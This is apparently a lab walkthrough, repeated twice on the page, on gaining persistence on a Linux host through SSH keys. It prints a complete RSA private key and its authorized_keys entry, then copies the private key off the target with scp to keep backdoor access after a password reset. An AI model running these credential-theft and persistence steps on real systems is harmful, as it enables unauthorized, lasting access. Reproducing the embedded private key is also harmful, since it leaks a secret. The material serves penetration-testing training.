Persistence via SSH Keys

SSH Keys

ls -al
    drwxr-xr-x 1 student student 4096 Apr 29 13:40 .
    drwxr-xr-x 1 root    root    4096 Apr 26  2019 ..
    -rw------- 1 student student    7 Apr 29 13:40 .bash_history
    drwx------ 2 student student 4096 Apr 29 13:39 .cache
    drwxr-xr-x 1 root    root    4096 Apr 26  2019 .ssh
    -rw-r--r-- 1 student student   91 Apr 26  2019 wait

cat wait
    Delete this file to trigger connection reset.
    Delete it only after planting the backdoor.

cd .ssh
ls
	authorized_keys  id_rsa

Show the private key inside id_rsa

cat id_rsa

-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA3JH1zC1WJuJ2KCPf1UdJe1dX+Uh4aE9RKsnuQk124eOB601/
8+Q6uJej38goVYQ7Dc4INK9Pq9cOs+uDQfRdjS1/9S7a0bDVORR6Q/E3dya0RDsz
LcaqX6LkPgnBZ2gS37E4mX6kiwEvYeqaAGyFqyfn+QPLos/Znc3EA4A71LPFg01b
AmpI6Gbaa7UUG+MCZoM0qDNo5Mzr5bmtCnVOKQ6n0Qx7znu5A2p00TfzmAo7erZ8
6xJUfXQoVFzqmINqhZKFZtjgV5nk/qHgn1BPyd6NoWeXADdIJKi7iq4jomT+Ny+/
HlxrAs1IJhxtrSExSMTkqmH/3KeX9ibBWXzY1QIDAQABAoIBAEO0liOvgvN6rlRR
9sJMGJVA0WNWyIcUWdDtnTJC/wwFvvqQlocx9oh1G7t0gFUHuuzY4pHxgl44LG40
C91x+kl8vvtu/4JAaqMT0xgJ8kGj4s/S8DnL8r5ajP8yFWj9fFWn27zaL/3vRjEj
R1R7+2f3XvCEJrz6Wk1jPRjqAvOeDRGH3ojsQwWO7k/FcvtqVBCPTGxyUBzXYv06
fM3OY5NL8D7t/bLoHa8dVhqjPnfUR7/IpiAdxEam1X0ObPB5YyBwSlpj6h904bF/
+U697IE23xjVmKMKcvTLe6QAxuRGSMf3/k3rCpDd3UxYF+P2e0CK3MefWjKpAe8r
2xRXyB0CgYEA+7zgmuhJqjik8tbt6b6+ZAJZ68TqLE1f3YEW/LivMeMj5tQZo/w+
0ZJnr6hR3eicMMxWKufGXSEtbs1TzMGvA5SXI9MTu62a5A2h7NDbLuKRwdjh9Qv6
TocFSMTSFcS4jvmbeYlVaSZWrJLLKY6lsjgdjDB4DH7Uc0Anxdr//GsCgYEA4E39
rlB7GWoCX7oXpSEGCHkQkmgX5IDU7+UUySFqD8fWoLsAc47R/TmDsKI+x83PF5jG
oo5P5LmUIeqnAKknTSyfD1YFtMa3tpTE68R9j/uueTK7v5izwWQjicmILm4RdkZJ
TVVH2b0aIQaUnpWWwHLa+BYx2jH4S2GxH89vz78CgYEA211SyApFLw0fR/Hc7kRm
OlYGL7qvaR2fvTDhbCYvnKRXQ61uDoUf5JXUvrBJbrtlZ+yX5dmE9OCVa6mHLbVV
oiQYtIIZ/wCgKbxrbybs6OVMqIQrGtNuMoHcK/Y/L/L19Lk0L2tqPy/GdamRWkxQ
vYXC0cfmxNS8oxWz0uktCrMCgYB6ufF9OMfBxgD6g4WAciss46CvmojIG71mbL8M
tV2kuMC0PN0oXRKELL3jHUKga/lNfefg9WC9UtS8IfmyINtCHJIDABwrJzdJjOiZ
326cIyb5ZUrYsCJaRAI117DNRqgDQL3GtEyV1CPBwin7Avny3mT0rKAmNIUYKaGS
OBuDXQKBgQDIRYOZEaV8rXx3wN24NYuByNUpRM3AIyPIwAuaPklWD6D2KdDveheI
lZtRb6Yzzmeon0DuLPdl7e/R7e5Z8Mx3o40aiJLULlw95JqON3J3W471PZAG1L/g
59PKgUMBNVX9UsUqvHyWlcY/FAT9UhWblgDoN3uXY9Db6q5x7hWzKw==
-----END RSA PRIVATE KEY-----

cat authorized_keys
    ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDckfXMLVYm4nYoI9/VR0l7V1f5SHhoT1Eqye5CTXbh44HrTX/z5Dq4l6PfyChVhDsNzgg0r0+r1w6z64NB9F2NLX/1LtrRsNU5FHpD8Td3JrREOzMtxqpfouQ+CcFnaBLfsTiZfqSLAS9h6poAbIWrJ+f5A8uiz9mdzcQDgDvUs8WDTVsCakjoZtprtRQb4wJmgzSoM2jkzOvlua0KdU4pDqfRDHvOe7kDanTRN/OYCjt6tnzrElR9dChUXOqYg2qFkoVm2OBXmeT+oeCfUE/J3o2hZ5cAN0gkqLuKriOiZP43L78eXGsCzUgmHG2tITFIxOSqYf/cp5f2JsFZfNjV root@localhost

Persistence

Exit the SSH session and download the id_rsa file

scp student@192.3.140.3:~/.ssh/id_rsa .
chmod 400 id_rsa

Log back into the target system and trigger the password and connection reset

ssh student@192.3.140.3
rm wait
# Old student's password do not work anymore

Connect to the target using the downloaded private key

ssh -i id_rsa student@192.3.140.3

PreviousSSHkey persistence module NextCron Jobs

Last updated 1 year ago

SSH Keys

ls -al
    drwxr-xr-x 1 student student 4096 Apr 29 13:40 .
    drwxr-xr-x 1 root    root    4096 Apr 26  2019 ..
    -rw------- 1 student student    7 Apr 29 13:40 .bash_history
    drwx------ 2 student student 4096 Apr 29 13:39 .cache
    drwxr-xr-x 1 root    root    4096 Apr 26  2019 .ssh
    -rw-r--r-- 1 student student   91 Apr 26  2019 wait

cat wait
    Delete this file to trigger connection reset.
    Delete it only after planting the backdoor.

cd .ssh
ls
	authorized_keys  id_rsa

Show the private key inside id_rsa

cat id_rsa

-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA3JH1zC1WJuJ2KCPf1UdJe1dX+Uh4aE9RKsnuQk124eOB601/
8+Q6uJej38goVYQ7Dc4INK9Pq9cOs+uDQfRdjS1/9S7a0bDVORR6Q/E3dya0RDsz
LcaqX6LkPgnBZ2gS37E4mX6kiwEvYeqaAGyFqyfn+QPLos/Znc3EA4A71LPFg01b
AmpI6Gbaa7UUG+MCZoM0qDNo5Mzr5bmtCnVOKQ6n0Qx7znu5A2p00TfzmAo7erZ8
6xJUfXQoVFzqmINqhZKFZtjgV5nk/qHgn1BPyd6NoWeXADdIJKi7iq4jomT+Ny+/
HlxrAs1IJhxtrSExSMTkqmH/3KeX9ibBWXzY1QIDAQABAoIBAEO0liOvgvN6rlRR
9sJMGJVA0WNWyIcUWdDtnTJC/wwFvvqQlocx9oh1G7t0gFUHuuzY4pHxgl44LG40
C91x+kl8vvtu/4JAaqMT0xgJ8kGj4s/S8DnL8r5ajP8yFWj9fFWn27zaL/3vRjEj
R1R7+2f3XvCEJrz6Wk1jPRjqAvOeDRGH3ojsQwWO7k/FcvtqVBCPTGxyUBzXYv06
fM3OY5NL8D7t/bLoHa8dVhqjPnfUR7/IpiAdxEam1X0ObPB5YyBwSlpj6h904bF/
+U697IE23xjVmKMKcvTLe6QAxuRGSMf3/k3rCpDd3UxYF+P2e0CK3MefWjKpAe8r
2xRXyB0CgYEA+7zgmuhJqjik8tbt6b6+ZAJZ68TqLE1f3YEW/LivMeMj5tQZo/w+
0ZJnr6hR3eicMMxWKufGXSEtbs1TzMGvA5SXI9MTu62a5A2h7NDbLuKRwdjh9Qv6
TocFSMTSFcS4jvmbeYlVaSZWrJLLKY6lsjgdjDB4DH7Uc0Anxdr//GsCgYEA4E39
rlB7GWoCX7oXpSEGCHkQkmgX5IDU7+UUySFqD8fWoLsAc47R/TmDsKI+x83PF5jG
oo5P5LmUIeqnAKknTSyfD1YFtMa3tpTE68R9j/uueTK7v5izwWQjicmILm4RdkZJ
TVVH2b0aIQaUnpWWwHLa+BYx2jH4S2GxH89vz78CgYEA211SyApFLw0fR/Hc7kRm
OlYGL7qvaR2fvTDhbCYvnKRXQ61uDoUf5JXUvrBJbrtlZ+yX5dmE9OCVa6mHLbVV
oiQYtIIZ/wCgKbxrbybs6OVMqIQrGtNuMoHcK/Y/L/L19Lk0L2tqPy/GdamRWkxQ
vYXC0cfmxNS8oxWz0uktCrMCgYB6ufF9OMfBxgD6g4WAciss46CvmojIG71mbL8M
tV2kuMC0PN0oXRKELL3jHUKga/lNfefg9WC9UtS8IfmyINtCHJIDABwrJzdJjOiZ
326cIyb5ZUrYsCJaRAI117DNRqgDQL3GtEyV1CPBwin7Avny3mT0rKAmNIUYKaGS
OBuDXQKBgQDIRYOZEaV8rXx3wN24NYuByNUpRM3AIyPIwAuaPklWD6D2KdDveheI
lZtRb6Yzzmeon0DuLPdl7e/R7e5Z8Mx3o40aiJLULlw95JqON3J3W471PZAG1L/g
59PKgUMBNVX9UsUqvHyWlcY/FAT9UhWblgDoN3uXY9Db6q5x7hWzKw==
-----END RSA PRIVATE KEY-----

Check the file too

cat authorized_keys
    ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDckfXMLVYm4nYoI9/VR0l7V1f5SHhoT1Eqye5CTXbh44HrTX/z5Dq4l6PfyChVhDsNzgg0r0+r1w6z64NB9F2NLX/1LtrRsNU5FHpD8Td3JrREOzMtxqpfouQ+CcFnaBLfsTiZfqSLAS9h6poAbIWrJ+f5A8uiz9mdzcQDgDvUs8WDTVsCakjoZtprtRQb4wJmgzSoM2jkzOvlua0KdU4pDqfRDHvOe7kDanTRN/OYCjt6tnzrElR9dChUXOqYg2qFkoVm2OBXmeT+oeCfUE/J3o2hZ5cAN0gkqLuKriOiZP43L78eXGsCzUgmHG2tITFIxOSqYf/cp5f2JsFZfNjV root@localhost

Persistence

Exit the SSH session and download the id_rsa file

scp student@192.3.140.3:~/.ssh/id_rsa .
chmod 400 id_rsa

Log back into the target system and trigger the password and connection reset

ssh student@192.3.140.3
rm wait
# Old student's password do not work anymore

Connect to the target using the downloaded private key

ssh -i id_rsa student@192.3.140.3